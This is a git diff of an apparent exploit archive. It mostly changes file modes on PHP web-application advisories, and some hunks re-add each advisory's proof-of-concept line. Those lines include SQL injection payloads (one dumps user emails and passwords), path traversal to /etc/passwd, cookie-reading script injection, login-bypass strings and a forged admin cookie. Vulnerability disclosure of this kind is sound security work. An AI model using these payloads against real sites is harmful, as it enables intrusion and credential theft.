b/platforms/php/webapps/34893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34894.txt b/platforms/php/webapps/34894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3490.txt b/platforms/php/webapps/3490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34902.txt b/platforms/php/webapps/34902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34903.txt b/platforms/php/webapps/34903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34904.txt b/platforms/php/webapps/34904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34905.txt b/platforms/php/webapps/34905.txt old mode 100755 new mode 100644 index beec8dcf7..a085eccff --- a/platforms/php/webapps/34905.txt +++ b/platforms/php/webapps/34905.txt @@ -8,4 +8,4 @@ The attacker may leverage the cross-site scripting issue to execute arbitrary sc w-Agora 4.2.1 and prior are vulnerable. -http://www.example.com/news/search.php3?bn=..\1 http://www.example.com/news/search.php3?bn=..\1 \ No newline at end of file +http://www.example.com/news/search.php3?bn=..\1 http://www.example.com/news/search.php3?bn=..\1 \ No newline at end of file diff --git a/platforms/php/webapps/34906.txt b/platforms/php/webapps/34906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34919.txt b/platforms/php/webapps/34919.txt old mode 100755 new mode 100644 index 5bb8838df..0fc9a45bf --- a/platforms/php/webapps/34919.txt +++ b/platforms/php/webapps/34919.txt @@ -6,4 +6,4 @@ Exploiting this issue requires administrative privileges and may allow an attack SkyBlueCanvas 1.1 r237 is vulnerable; other versions may also be affected. -http://www.example.com/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/ \ No newline at end of file +http://www.example.com/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/ \ No newline at end of file diff --git a/platforms/php/webapps/3492.txt b/platforms/php/webapps/3492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34922.txt b/platforms/php/webapps/34922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34930.txt b/platforms/php/webapps/34930.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34933.txt b/platforms/php/webapps/34933.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34935.txt b/platforms/php/webapps/34935.txt old mode 100755 new mode 100644 index 392d355b7..87bd65e11 --- a/platforms/php/webapps/34935.txt +++ b/platforms/php/webapps/34935.txt @@ -4,4 +4,4 @@ LES PACKS is prone to an SQL-injection vulnerability. An attacker can exploit this SQL-injection issue to carry out unauthorized actions on the underlying database, which may compromise the application and aid in further attacks. -http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15 \ No newline at end of file +http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15 \ No newline at end of file diff --git a/platforms/php/webapps/34937.txt b/platforms/php/webapps/34937.txt old mode 100755 new mode 100644 index 3d120a2f3..7d03deca8 --- a/platforms/php/webapps/34937.txt +++ b/platforms/php/webapps/34937.txt @@ -18,4 +18,4 @@ http://www.example.com/[path]/?language=../../../../../../../etc/passwd%00 Cross Site Scripting: -http://www.example.com/[path]/library/sites/editor.php?category=[XSS] \ No newline at end of file +http://www.example.com/[path]/library/sites/editor.php?category=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/34939.txt b/platforms/php/webapps/34939.txt old mode 100755 new mode 100644 index 6bdeb9b3b..1f93180c6 --- a/platforms/php/webapps/34939.txt +++ b/platforms/php/webapps/34939.txt @@ -17,4 +17,4 @@ http://www.example.com/news/login.php3?bn=1 Any folder (only on Windows-servers): http://www.example.com/news/for-print.php3?bn=..\1 -http://www.example.com/news/login.php3?bn=..\1 \ No newline at end of file +http://www.example.com/news/login.php3?bn=..\1 \ No newline at end of file diff --git a/platforms/php/webapps/3494.txt b/platforms/php/webapps/3494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34940.txt b/platforms/php/webapps/34940.txt old mode 100755 new mode 100644 index 5a3a3126c..dfbe9cadd --- a/platforms/php/webapps/34940.txt +++ b/platforms/php/webapps/34940.txt @@ -7,4 +7,4 @@ Remote attackers can use a specially crafted request with directory-traversal se 212cafe WebBoard 2.90 beta is vulnerable; other versions may also be affected. http://www.example.com/webboard/view.php?topic=../../../../../../etc/passwd%00 -http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula \ No newline at end of file +http://www.example.com/webboard/view.php?topic=../../../../../../WINDOWS/system32/eula \ No newline at end of file diff --git a/platforms/php/webapps/34941.txt b/platforms/php/webapps/34941.txt old mode 100755 new mode 100644 index 54f803efe..9ed701d73 --- a/platforms/php/webapps/34941.txt +++ b/platforms/php/webapps/34941.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Arcade Trade Script 1.0 beta is vulnerable; other versions may also be affected. -http://www.example.com/index.php?a=gamelist&q=[XSS]&submit=GO \ No newline at end of file +http://www.example.com/index.php?a=gamelist&q=[XSS]&submit=GO \ No newline at end of file diff --git a/platforms/php/webapps/34942.txt b/platforms/php/webapps/34942.txt old mode 100755 new mode 100644 index c4d8d7f4b..8918ed3a6 --- a/platforms/php/webapps/34942.txt +++ b/platforms/php/webapps/34942.txt @@ -18,4 +18,4 @@ https://www.example.com/index.php?menu=summary_by_extension&option_fil=&value_fi https://www.example.com/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E -https://www.example.com/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file +https://www.example.com/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/34944.txt b/platforms/php/webapps/34944.txt old mode 100755 new mode 100644 index f4b469ee4..d540511fe --- a/platforms/php/webapps/34944.txt +++ b/platforms/php/webapps/34944.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to view the source code of files in t SmartOptimizer 1.7 is vulnerable; prior versions may also be affected. -http://www.example.com/smartoptimizer/index.php?../index.php%00.js \ No newline at end of file +http://www.example.com/smartoptimizer/index.php?../index.php%00.js \ No newline at end of file diff --git a/platforms/php/webapps/34946.txt b/platforms/php/webapps/34946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34947.txt b/platforms/php/webapps/34947.txt old mode 100755 new mode 100644 index 6da5bcbff..6b2e01549 --- a/platforms/php/webapps/34947.txt +++ b/platforms/php/webapps/34947.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica CMS WebManager-Pro 7.4.3 is vulnerable; other verisons may also be affected. -http://www.example.com/index.php?word[]={XSS} \ No newline at end of file +http://www.example.com/index.php?word[]={XSS} \ No newline at end of file diff --git a/platforms/php/webapps/34951.txt b/platforms/php/webapps/34951.txt old mode 100755 new mode 100644 index 7fff772d7..b24d42182 --- a/platforms/php/webapps/34951.txt +++ b/platforms/php/webapps/34951.txt @@ -8,4 +8,4 @@ Online Work Order Suite 2.10 is vulnerable; other versions may also be affected. The following example data is available: -' or 1=1 or ''='' \ No newline at end of file +' or 1=1 or ''='' \ No newline at end of file diff --git a/platforms/php/webapps/34955.txt b/platforms/php/webapps/34955.txt old mode 100755 new mode 100644 index 2cbb91169..2ccde30d0 --- a/platforms/php/webapps/34955.txt +++ b/platforms/php/webapps/34955.txt @@ -8,4 +8,4 @@ Versions prior to Joomla! 1.5.22 are vulnerable. http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injection/sqli_(filter_order)_front.jpg http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injectio /sqli_%28filter_order_Dir%29_front.jpg -http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injectio /sqli_%28filter_order_Dir%29_back.jpg \ No newline at end of file +http://yehg.net/lab/pr0js/advisories/joomla/core/1.5.21/sql_injectio /sqli_%28filter_order_Dir%29_back.jpg \ No newline at end of file diff --git a/platforms/php/webapps/34959.txt b/platforms/php/webapps/34959.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3496.php b/platforms/php/webapps/3496.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34965.txt b/platforms/php/webapps/34965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34968.txt b/platforms/php/webapps/34968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3497.php b/platforms/php/webapps/3497.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34972.txt b/platforms/php/webapps/34972.txt old mode 100755 new mode 100644 index 769ac7f6a..9cd9d905f --- a/platforms/php/webapps/34972.txt +++ b/platforms/php/webapps/34972.txt @@ -4,4 +4,4 @@ The AutoArticles 3000 component for Joomla! is prone to an SQL-injection vulnera Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_a3000&task=showarticle&id=1 [Blind Sql] \ No newline at end of file +http://www.example.com/index.php?option=com_a3000&task=showarticle&id=1 [Blind Sql] \ No newline at end of file diff --git a/platforms/php/webapps/34973.txt b/platforms/php/webapps/34973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34974.txt b/platforms/php/webapps/34974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34975.txt b/platforms/php/webapps/34975.txt old mode 100755 new mode 100644 index 2b17063e9..3f91dee38 --- a/platforms/php/webapps/34975.txt +++ b/platforms/php/webapps/34975.txt @@ -6,4 +6,4 @@ Exploiting this issue can allow an attacker to obtain sensitive information that SEO Tools 3.0 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/seo-automatic-seo-tools/feedcommander/get_download.php?file=../../../../../../../../windows/win.ini \ No newline at end of file diff --git a/platforms/php/webapps/34976.txt b/platforms/php/webapps/34976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34977.txt b/platforms/php/webapps/34977.txt old mode 100755 new mode 100644 index d6a8aa8e5..59dd725e8 --- a/platforms/php/webapps/34977.txt +++ b/platforms/php/webapps/34977.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to view local files in the context of the aff jRSS Widget 1.1.1 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/jrss-widget/proxy.php?url=../../../../../../../../windows/win.ini \ No newline at end of file diff --git a/platforms/php/webapps/3498.txt b/platforms/php/webapps/3498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34988.txt b/platforms/php/webapps/34988.txt old mode 100755 new mode 100644 index 870ff216e..9db1e8a44 --- a/platforms/php/webapps/34988.txt +++ b/platforms/php/webapps/34988.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary HTML and script code in PHPShop 2.1 EE is vulnerable; other versions may also be affected. -http://www.example.com/uploads/2010/PHPShop%20XSS.html \ No newline at end of file +http://www.example.com/uploads/2010/PHPShop%20XSS.html \ No newline at end of file diff --git a/platforms/php/webapps/34989.txt b/platforms/php/webapps/34989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34990.txt b/platforms/php/webapps/34990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34992.txt b/platforms/php/webapps/34992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34993.php b/platforms/php/webapps/34993.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/34995.txt b/platforms/php/webapps/34995.txt old mode 100755 new mode 100644 index acfbaf781..cfafe286d --- a/platforms/php/webapps/34995.txt +++ b/platforms/php/webapps/34995.txt @@ -4,4 +4,4 @@ Simea CMS is prone to an SQL-injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/path/index.php?product=-1+union+select+1,2,concat(version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 \ No newline at end of file +http://www.example.com/path/index.php?product=-1+union+select+1,2,concat(version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 \ No newline at end of file diff --git a/platforms/php/webapps/34996.txt b/platforms/php/webapps/34996.txt old mode 100755 new mode 100644 index 0cc4f0439..ef319df54 --- a/platforms/php/webapps/34996.txt +++ b/platforms/php/webapps/34996.txt @@ -4,4 +4,4 @@ Raised Eyebrow CMS is prone to an SQL-injection vulnerability because it fails t Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/path/venue.php?id=-1+union+select+1,2,3,4,5 \ No newline at end of file +http://www.example.com/path/venue.php?id=-1+union+select+1,2,3,4,5 \ No newline at end of file diff --git a/platforms/php/webapps/3500.htm b/platforms/php/webapps/3500.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35004.txt b/platforms/php/webapps/35004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3501.txt b/platforms/php/webapps/3501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35016.txt b/platforms/php/webapps/35016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35017.txt b/platforms/php/webapps/35017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3502.php b/platforms/php/webapps/3502.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35022.txt b/platforms/php/webapps/35022.txt old mode 100755 new mode 100644 index f51a08cc2..86a84df7a --- a/platforms/php/webapps/35022.txt +++ b/platforms/php/webapps/35022.txt @@ -4,4 +4,4 @@ source: http://www.securityfocus.com/bid/45079/info A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/4images/categories.php?cat_id=1&page=-2999+%27%29+union/ \ No newline at end of file +http://www.example.com/4images/categories.php?cat_id=1&page=-2999+%27%29+union/ \ No newline at end of file diff --git a/platforms/php/webapps/35023.txt b/platforms/php/webapps/35023.txt old mode 100755 new mode 100644 index 811141d6e..c88cd01c0 --- a/platforms/php/webapps/35023.txt +++ b/platforms/php/webapps/35023.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Wernhart Guestbook 2001.03.28 is vulnerable; other versions may also be affected. -http://www.example.com/guestbook/insert.phtml?LastName=' union select 1,2,3,4,5,6/* \ No newline at end of file +http://www.example.com/guestbook/insert.phtml?LastName=' union select 1,2,3,4,5,6/* \ No newline at end of file diff --git a/platforms/php/webapps/35024.txt b/platforms/php/webapps/35024.txt old mode 100755 new mode 100644 index c9caa56d5..fccff9461 --- a/platforms/php/webapps/35024.txt +++ b/platforms/php/webapps/35024.txt @@ -6,4 +6,4 @@ An attacker can exploit these vulnerabilities to compromise the application, acc http://www.example.com/index.php?option=com_catalogue&Itemid=73&cat_id=[SQLi] -http://www.example.com/index.php?option=com_catalogue&controller=[LFI] \ No newline at end of file +http://www.example.com/index.php?option=com_catalogue&controller=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/35025.html b/platforms/php/webapps/35025.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35026.txt b/platforms/php/webapps/35026.txt old mode 100755 new mode 100644 index dbafa6225..f3ecafe69 --- a/platforms/php/webapps/35026.txt +++ b/platforms/php/webapps/35026.txt @@ -4,4 +4,4 @@ Joomla! Store Directory is prone to an SQL-injection vulnerability because it fa Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_storedirectory&task=view&id=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_storedirectory&task=view&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35027.txt b/platforms/php/webapps/35027.txt old mode 100755 new mode 100644 index 40c7662d2..31f6f5d66 --- a/platforms/php/webapps/35027.txt +++ b/platforms/php/webapps/35027.txt @@ -9,4 +9,4 @@ E-lokaler CMS 2 is vulnerable; other versions may also be affected. The following example inputs are available: Username: ' or 1=1-- - -Password: ' or 1=1-- - \ No newline at end of file +Password: ' or 1=1-- - \ No newline at end of file diff --git a/platforms/php/webapps/35028.txt b/platforms/php/webapps/35028.txt old mode 100755 new mode 100644 index 8a0d984b7..ada2a3c8b --- a/platforms/php/webapps/35028.txt +++ b/platforms/php/webapps/35028.txt @@ -5,4 +5,4 @@ SmartBox is prone to an SQL-injection vulnerability because the application fail A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/page.php?page_id=14%20and%20substring%28@@version,1,1%29=5 \ No newline at end of file +http://www.example.com/page.php?page_id=14%20and%20substring%28@@version,1,1%29=5 \ No newline at end of file diff --git a/platforms/php/webapps/3503.txt b/platforms/php/webapps/3503.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35036.txt b/platforms/php/webapps/35036.txt old mode 100755 new mode 100644 index b92283277..7acd65237 --- a/platforms/php/webapps/35036.txt +++ b/platforms/php/webapps/35036.txt @@ -4,4 +4,4 @@ The Annuaire component for Joomla! is prone to an SQL-injection vulnerability be Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_annuaire&view=annuaire&type=cat&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35042.txt b/platforms/php/webapps/35042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35043.txt b/platforms/php/webapps/35043.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35044.txt b/platforms/php/webapps/35044.txt old mode 100755 new mode 100644 index fc55eb379..91bc56a3c --- a/platforms/php/webapps/35044.txt +++ b/platforms/php/webapps/35044.txt @@ -8,4 +8,4 @@ Alguest 1.1c-patched is vulnerable; other versions may also be affected. The following example input is available: -Cookie: admin=anyvalue \ No newline at end of file +Cookie: admin=anyvalue \ No newline at end of file diff --git a/platforms/php/webapps/35046.txt b/platforms/php/webapps/35046.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3505.php b/platforms/php/webapps/3505.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35050.txt b/platforms/php/webapps/35050.txt old mode 100755 new mode 100644 index f99a4ba94..4698685cd --- a/platforms/php/webapps/35050.txt +++ b/platforms/php/webapps/35050.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Alguest 1.1c-patched is vulnerable; other versions may also be affected. -http://www.example.com/alguest/index.php?start=' \ No newline at end of file +http://www.example.com/alguest/index.php?start=' \ No newline at end of file diff --git a/platforms/php/webapps/35052.txt b/platforms/php/webapps/35052.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3506.htm b/platforms/php/webapps/3506.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35060.txt b/platforms/php/webapps/35060.txt old mode 100755 new mode 100644 index 9a682a07e..99153785c --- a/platforms/php/webapps/35060.txt +++ b/platforms/php/webapps/35060.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce Aigaion 1.3.4 is vulnerable; other versions may also be affected. -http://www.example.com/Aigaion/ indexlight.php?page=export&type=single&format=RIS&ID=[SQLi] \ No newline at end of file +http://www.example.com/Aigaion/ indexlight.php?page=export&type=single&format=RIS&ID=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35063.txt b/platforms/php/webapps/35063.txt old mode 100755 new mode 100644 index 0013a0ba8..37811bae2 --- a/platforms/php/webapps/35063.txt +++ b/platforms/php/webapps/35063.txt @@ -4,4 +4,4 @@ Zimplit CMS is prone to multiple cross-site-scripting vulnerabilities because it An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/path/zimplit.php?action=load&file=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file +http://www.example.com/path/zimplit.php?action=load&file=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35064.txt b/platforms/php/webapps/35064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35066.txt b/platforms/php/webapps/35066.txt old mode 100755 new mode 100644 index e72ae8c1d..001bdf75f --- a/platforms/php/webapps/35066.txt +++ b/platforms/php/webapps/35066.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WordPress Processing Embed plugin 0.5 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/wordpress-processing-embed/data/popup.php?pluginurl=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wordpress-processing-embed/data/popup.php?pluginurl=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35067.txt b/platforms/php/webapps/35067.txt old mode 100755 new mode 100644 index 655cdbade..fb3a3d77e --- a/platforms/php/webapps/35067.txt +++ b/platforms/php/webapps/35067.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Safe Search 0.7 is vulnerable; other versions may also be affected. 2010-12-08 -http://www.example.com/wordpress/wp-content/plugins/wp-safe-search/wp-safe-search-jx.php?v1=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wp-safe-search/wp-safe-search-jx.php?v1=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35072.txt b/platforms/php/webapps/35072.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35073.txt b/platforms/php/webapps/35073.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3508.txt b/platforms/php/webapps/3508.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35084.txt b/platforms/php/webapps/35084.txt old mode 100755 new mode 100644 index b7dc2e681..4e1bf7781 --- a/platforms/php/webapps/35084.txt +++ b/platforms/php/webapps/35084.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Twitter Feed 0.3.1 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file +http://www.example.com/wordpress/wp-content/plugins/wp-twitter-feed/magpie/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35087.txt b/platforms/php/webapps/35087.txt old mode 100755 new mode 100644 index 0d044894f..1d4454e52 --- a/platforms/php/webapps/35087.txt +++ b/platforms/php/webapps/35087.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to obtain sensitive information; other atta net2ftp 0.98 stable is vulnerable; other versions may also be affected. -http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil \ No newline at end of file +http://www.example.com/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil \ No newline at end of file diff --git a/platforms/php/webapps/35088.txt b/platforms/php/webapps/35088.txt old mode 100755 new mode 100644 index ad78777a0..036e325c3 --- a/platforms/php/webapps/35088.txt +++ b/platforms/php/webapps/35088.txt @@ -4,4 +4,4 @@ PHP State is prone to an SQL-injection vulnerability because the application fai A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe - \ No newline at end of file +http://www.example.com/state.php?id=37+union+select+1,2,3,4,5,6,7,concat_ws (0x3a,user(),database(),versi(),@version_compile_os),8,9,10,11- josalijoe - \ No newline at end of file diff --git a/platforms/php/webapps/35089.txt b/platforms/php/webapps/35089.txt old mode 100755 new mode 100644 index 7a3393946..460f4d236 --- a/platforms/php/webapps/35089.txt +++ b/platforms/php/webapps/35089.txt @@ -4,4 +4,4 @@ Joomla Jeformcr is prone to an SQL-injection vulnerability because it fails to s Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_jeformcr&view=form&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/35090.txt b/platforms/php/webapps/35090.txt old mode 100755 new mode 100644 index 3f461b86d..9ee07820c --- a/platforms/php/webapps/35090.txt +++ b/platforms/php/webapps/35090.txt @@ -4,4 +4,4 @@ JExtensions Property Finder is prone to an SQL-injection vulnerability because i Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT] \ No newline at end of file +http://www.example.com/index.php?option=com_jesectionfinder&view=sectiondetail&sf_id=[EXPLOIT] \ No newline at end of file diff --git a/platforms/php/webapps/35091.txt b/platforms/php/webapps/35091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35094.txt b/platforms/php/webapps/35094.txt old mode 100755 new mode 100644 index 5819c9ac1..87a2658a5 --- a/platforms/php/webapps/35094.txt +++ b/platforms/php/webapps/35094.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow slickMsg 0.7-alpha is vulnerable; other versions may also be affected. -http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file +http://www.example.com/slickmsg/views/Thread/display/top.php?title=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35096.txt b/platforms/php/webapps/35096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35097.txt b/platforms/php/webapps/35097.txt old mode 100755 new mode 100644 index c8c21505d..e302406db --- a/platforms/php/webapps/35097.txt +++ b/platforms/php/webapps/35097.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Joomla Redirect 1.5.19 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/index.php?option=com_redirect&view=../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/35098.txt b/platforms/php/webapps/35098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35099.txt b/platforms/php/webapps/35099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35100.txt b/platforms/php/webapps/35100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35106.txt b/platforms/php/webapps/35106.txt old mode 100755 new mode 100644 index 7b8c6d601..55a7d341c --- a/platforms/php/webapps/35106.txt +++ b/platforms/php/webapps/35106.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Cetera eCommerce version 14.0 is vulnerable; other versions may also be affected. -http://www.example.com/cms/templats/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/cms/templats/banner.php?bannerId=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35108.txt b/platforms/php/webapps/35108.txt old mode 100755 new mode 100644 index 9d5d35294..bea4c72bf --- a/platforms/php/webapps/35108.txt +++ b/platforms/php/webapps/35108.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MyBB 1.6 is vulnerable; other versions may be also be affected. -http://www.example.com/tags.php?tag="><script>alert(String.fromCharCode(88,83,83))</script> \ No newline at end of file +http://www.example.com/tags.php?tag="><script>alert(String.fromCharCode(88,83,83))</script> \ No newline at end of file diff --git a/platforms/php/webapps/35109.txt b/platforms/php/webapps/35109.txt old mode 100755 new mode 100644 index 30fd37a8a..47df7f1b7 --- a/platforms/php/webapps/35109.txt +++ b/platforms/php/webapps/35109.txt @@ -10,4 +10,4 @@ The following example URIs are available: http://www.example.com/topsites/rate.php?site=-999.9%27%20UNION%20ALL%20SELECT%20%28SELECT%20concat%280x7e,group_concat%28top_user.email,0x7e,top_user.password%29,0x7e%29%20FROM%20%60topfunsites_com_-_topsites%60.top_user%29%20,null%20and%20%27x%27=%27x -http://www.example.com/topsites/rate.php?site="'><script>alert('xss')</script> \ No newline at end of file +http://www.example.com/topsites/rate.php?site="'><script>alert('xss')</script> \ No newline at end of file diff --git a/platforms/php/webapps/35110.txt b/platforms/php/webapps/35110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35111.txt b/platforms/php/webapps/35111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35113.php b/platforms/php/webapps/35113.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35114.txt b/platforms/php/webapps/35114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/35116.txt b/platforms/php/webapps/35116.txt old mode 100755 new mode 100644 index be1346b41..8e1b60789 --- a/platforms/php/webapps/35116.txt +++ b/platforms/php/webapps/35116.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Versions prior to HP Insight Diagnostics Online Edition 8.5.1.3712 